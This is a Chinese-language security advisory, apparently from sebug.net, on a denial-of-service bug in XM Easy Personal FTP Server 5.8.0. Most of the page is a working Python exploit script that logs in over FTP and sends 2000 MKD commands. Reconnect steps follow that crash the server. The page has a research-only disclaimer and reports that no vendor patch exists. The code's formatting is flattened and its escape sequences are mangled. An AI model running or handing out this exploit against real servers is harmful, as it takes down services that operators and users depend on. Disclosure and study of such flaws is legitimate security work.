XM Easy Personal FTP Server多个文件/文件夹上传拒绝服务漏洞

XM Easy Personal FTP Server多个文件/文件夹上传拒绝服务漏洞 影响版本:

dxmsoft XM Easy Personal FTP Server 5.8.0

漏洞描述:

BUGTRAQ  ID: 37112XM Easy Personal FTP Server无法处理根目录中多于2000个的文件或文件夹，用户向服务器上传大量文件或文件夹后关闭连接，然后重新连接到服务器就会导致崩溃。

<*参考

leinakesi （leinakesi@gmail.com）

*>测试方法:[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!

Exploit example:1.upload 2000 folders.#!/usr/bin/pythonimport socketimport sysdef Usage():    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>/n")    print ("Example:./expl.py 192.168.48.183 anonymous anonymous/n")if len(sys.argv) <> 4:        Usage()        sys.exit(1)else:    hostname=sys.argv[1]    username=sys.argv[2]    passwd=sys.argv[3]    test_string='a'    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    try:        sock.connect((hostname, 21))    except:        print ("Connection error!")        sys.exit(1)    r=sock.recv(1024)    sock.send("user %s/r/n" %username)    r=sock.recv(1024)    sock.send("pass %s/r/n" %passwd)    for i in range(1,200):         sock.send("mkd " + "a" * i +"/r/n")         print "[-] " + ("mkd " + "a" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    for i in range(1,200):         sock.send("mkd " + "b" * i +"/r/n")         print "[-] " + ("mkd " + "b" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    for i in range(1,200):         sock.send("mkd " + "c" * i +"/r/n")         print "[-] " + ("mkd " + "c" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    for i in range(1,200):         sock.send("mkd " + "d" * i +"/r/n")         print "[-] " + ("mkd " + "d" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    for i in range(1,200):         sock.send("mkd " + "e" * i +"/r/n")         print "[-] " + ("mkd " + "e" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    for i in range(1,200):         sock.send("mkd " + "f" * i +"/r/n")         print "[-] " + ("mkd " + "f" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    for i in range(1,200):         sock.send("mkd " + "g" * i +"/r/n")         print "[-] " + ("mkd " + "g" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    for i in range(1,200):         sock.send("mkd " + "h" * i +"/r/n")         print "[-] " + ("mkd " + "h" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    for i in range(1,200):         sock.send("mkd " + "i" * i +"/r/n")         print "[-] " + ("mkd " + "i" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    for i in range(1,200):         sock.send("mkd " + "j" * i +"/r/n")         print "[-] " + ("mkd " + "j" * i +"/r/n")         r=sock.recv(1024)         print "[+] " + r + "/r/n"    sock.close()    sys.exit(0);2.use a ftp client to reconnect the serverfor example:start->run->cmd->ftp 127.0.0.1->*****->*****->dir

SEBUG安全建议:

厂商补丁：dxmsoft-------目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：